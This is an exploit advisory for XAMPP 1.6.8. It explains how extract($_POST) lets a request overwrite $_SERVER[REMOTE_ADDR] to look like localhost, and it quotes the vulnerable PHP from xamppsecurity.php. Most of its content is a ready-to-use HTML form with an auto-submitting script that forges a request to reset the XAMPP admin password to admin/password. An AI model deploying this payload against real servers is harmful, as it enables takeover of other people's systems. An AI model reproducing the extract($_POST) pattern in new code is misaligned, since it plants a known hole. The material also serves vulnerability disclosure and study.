XAMPP 1.6.8 Password Exploit

`XAMPP change administrative password:  
--------------------------------------------------------------------------------  
Written by Michael Brooks  
special thanks to str0ke  
  
Affects XAMPP 1.6.8.  
homepage: http://www.apachefriends.org/  
XAMPP has 17+ million downloads from sourceforge.net.  
register_globals=On or Off  
This attack is exploitable even when this page is reporting a fully  
secure system: http://10.1.1.10/security/index.php  
  
There are two vulnerabilities that are being used toagther.  
1)Global variable manipulation to spoof ip address.  
2)XSRF to change the .htaccess password for http://10.1.1.10/security/  
and http://10.1.1.10/xampp/ .  
  
The $_SERVER[REMOTE_ADDR] comes directly from Apache's tcp socket and  
this cannot normally be spoofed.  
However extract($_POST); can be used to overwrite any declared  
variable, including the $_SERVER superglobal. This can be used to  
"spoof" your ip address as 127.0.0.1  
This xsrf attack can be exploited from a browser in any ip address, so  
long as that browser is currently authenticated.  
  
This vulnerable code is from the very top of: /security/xamppsecurity.php  
<?php  
error_reporting(0);  
extract($_POST);  
extract($_SERVER);  
$host = "127.0.0.1";  
$timeout = "1";  
  
if ($REMOTE_ADDR) {  
if ($REMOTE_ADDR != $host) {  
echo "<h2> FORBIDDEN FOR CLIENT $REMOTE_ADDR <h2>";  
exit;  
}  
}  
//...  
  
//Start of xsrf attack  
<html>  
<form action='http://10.1.1.10/security/xamppsecurity.php' method='POST' id=1>  
<input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">  
<input type=hidden name="xamppuser" value=admin >  
<input type=hidden name="xampppasswd" value=password>  
<input type=hidden name="xamppaccess" value="Make+safe+the+XAMPP+directory">  
<input type=submit>  
</form>  
</html>  
<script>  
document.getElementById(1).submit();  
</script>  
//End of xsrf attack  
  
`